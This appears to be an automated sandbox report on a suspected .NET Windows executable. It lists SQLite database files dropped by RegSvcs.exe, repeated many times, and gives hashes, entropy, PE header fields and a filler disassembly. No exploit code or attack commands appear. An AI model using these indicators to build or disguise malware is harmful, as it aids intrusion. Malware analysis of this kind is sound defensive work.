                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):40960
                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):40960
                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):40960
                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):40960
                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):106496
                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):106496
                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):106496
                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):106496
                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):106496
                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):106496
                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):106496
                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):106496
                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):106496
                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):106496
                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):106496
                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):106496
                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                  Entropy (8bit):7.9075051804442875
                                                                                                                                                  TrID:
                                                                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                  File name:MfzXU6tKOq.exe
                                                                                                                                                  File size:570'880 bytes
                                                                                                                                                  MD5:3d63b777f65056b236ba51180cd37ce0
                                                                                                                                                  SHA1:94a4653797f942c4f2eb1ac36707d66e5cef401f
                                                                                                                                                  SHA256:d2ddb7d466186ab167e6799198ef76d678ad0ac098a5deacb5a99383aa54b717
                                                                                                                                                  SHA512:10b6f38a651593a7fbb2209907b4ce16bfccb07db858dd826f27d3a5b8270cf4b09b4a54233e2804d3fcd909f775b5e5c85c0b6923ec65afbf767e46a341a37e
                                                                                                                                                  SSDEEP:12288:5JjHQC3RbeXNMR4xfLH4mU7D+MCyWQNIQTkduiY0D:5tQC35eXN/fLo+MrWQNxkQiBD
                                                                                                                                                  TLSH:A5C4120037F49BB2D5BE47F94C04725503BAA1176261EA1C0FC764DB2AA3B568D32F6B
                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...19@...............0.............B.... ........@.. ....................................@................................
                                                                                                                                                  Icon Hash:62ceac86b2968ea2
                                                                                                                                                  Entrypoint:0x48bb42
                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                  Digitally signed:false
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                  Time Stamp:0xDC403931 [Tue Feb 4 11:27:45 2087 UTC]
                                                                                                                                                  TLS Callbacks:
                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                  OS Version Major:4
                                                                                                                                                  OS Version Minor:0
                                                                                                                                                  File Version Major:4
                                                                                                                                                  File Version Minor:0
                                                                                                                                                  Subsystem Version Major:4
                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                  Instruction
                                                                                                                                                  jmp dword ptr [00402000h]
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  add byte ptr [eax], al
                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x8baef0x4f.text
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x8c0000x1470.rsrc
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x8e0000xc.reloc
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x890a00x70.text
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
